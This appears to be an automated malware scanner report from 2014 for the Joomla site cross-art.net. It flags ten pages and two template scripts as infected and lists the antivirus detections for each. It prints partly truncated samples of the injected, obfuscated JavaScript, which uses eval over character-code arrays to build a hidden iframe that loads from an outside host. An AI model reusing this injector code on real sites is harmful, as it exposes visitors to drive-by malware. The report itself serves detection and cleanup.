New scan:

Malware Scanner report for cross-art.net

Malicious/Suspicious/Total urls checked
10/0/16
10 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "cross-art.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cross-art.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://cross-art.net/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 00:01:25 GMT
Via: 1.1 varnish
Age: 0
Location: http://cross-art.net/joomla15/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 2934472428 2934472310
clean
http://cross-art.net/joomla15/
200 OK
Content-Length: 17730
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://cross-art.net/joomla15/templates/crossartnetv25/jquery.js
200 OK
Content-Length: 97154
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x74,0x70,0x2e,0x6f,0x70,0x6a,0x61,0x62,0x6c,0x6f,0x6e,0x69,0x63,0x61,
... 1429 bytes are skipped ...
,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x75,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=233;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-447!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}

Antivirus reports:

AntiVir
JS/Redirector.BQ.4
Avast
JS:Redirector-AHD [Trj]
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Redirector.BMV
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
MicroWorld-eScan
Trojan.JS.Redirector.BMV
Fortinet
JS/Iframe.W!tr
F-Secure
Trojan.JS.Redirector.BMV
GData
Trojan.JS.Redirector.BMV
BitDefender
Trojan.JS.Redirector.BMV

http://cross-art.net/joomla15/templates/crossartnetv25/script.js
200 OK
Content-Length: 12481
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x74,0x70,0x2e,0x6f,0x70,0x6a,0x61,0x62,0x6c,0x6f,0x6e,0x69,0x63,0x61,
... 1429 bytes are skipped ...
,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x75,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=233;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-447!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}

Antivirus reports:

AntiVir
JS/Redirector.BQ.4
Avast
JS:Redirector-AHD [Trj]
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Redirector.BMV
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
MicroWorld-eScan
Trojan.JS.Redirector.BMV
Fortinet
JS/Iframe.W!tr
F-Secure
Trojan.JS.Redirector.BMV
GData
Trojan.JS.Redirector.BMV
BitDefender
Trojan.JS.Redirector.BMV

http://cross-art.net/joomla15/index.php?option=com_content&view=frontpage&Itemid=56
200 OK
Content-Length: 17978
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/index.php?option=com_wrapper&view=wrapper&Itemid=68
200 OK
Content-Length: 13212
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=49&Itemid=72
200 OK
Content-Length: 20569
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://www.avira.com/includes/js/av_threats_defaults.js
200 OK
Content-Length: 14148
Content-Type: application/x-javascript
clean
http://www.avira.com/includes/js/av_threats_resources.js
200 OK
Content-Length: 1770
Content-Type: application/x-javascript
clean
http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=55&Itemid=77
200 OK
Content-Length: 15669
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=57
200 OK
Content-Length: 17255
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/index.php?option=com_wrapper&view=wrapper&Itemid=79
200 OK
Content-Length: 13160
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://cross-art.net/joomla15/administrator/
200 OK
Content-Length: 4254
Content-Type: text/html
clean
http://cross-art.net/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=54&Itemid=73
200 OK
Content-Length: 14659
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04
... 1450 bytes are skipped ...
0,0131,044,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0156,0140,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0156,0140,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+464!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cross-art.net

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 00:01:25 GMT
Via: 1.1 varnish
Age: 0
Location: http://cross-art.net/joomla15/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 2934472428 2934472310
Second query (visit from search engine):
GET / HTTP/1.1
Host: cross-art.net
Referer: http://www.google.com/search?q=cross-art.net

Result:
The result is similar to the first query. There are no suspicious redirects found.